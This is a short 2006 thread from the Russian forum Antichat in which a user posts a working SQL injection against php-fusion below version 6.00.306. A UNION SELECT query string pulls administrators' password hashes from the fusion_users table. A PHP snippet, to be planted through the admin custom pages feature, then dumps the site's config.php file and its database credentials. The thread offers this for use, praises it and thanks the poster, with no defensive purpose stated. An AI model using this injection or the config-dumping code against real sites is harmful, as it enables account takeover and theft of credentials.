Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   SQL - инъекция в php-fusion < v6.00.306 (https://forum.antichat.xyz/showthread.php?t=20541)

liauliau 15.06.2006 17:10

SQL - инъекция в php-fusion < v6.00.306
 
работает отлично! :D

Код:

messages.php?folder=inbox&show=_&srch_where=+AND+1=1+UNION+SELECT+0%2C0%2C0%2Cuser_password%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0+FROM+fusion_users+WHERE+user_level%3D103%2F%2A
/administration/custom_pages.php

Код:

<?php
$DATA_FILE = "".BASEDIR."config.php";
$text = 100;
$names = file($DATA_FILE);
for ($i = count($names) - 1 - $for; $i >= count($names) - $for - $text; $i = $i - 1) {
if ($names[$i]) {
list ($name) = split ("\t", $names[$i]);
print "$name<br>";
}
}
?>

короткое video тут

;)

Romaxa55 29.06.2006 00:58

Молодца Дружище, спасибо за уязвимость!!


Время: 16:45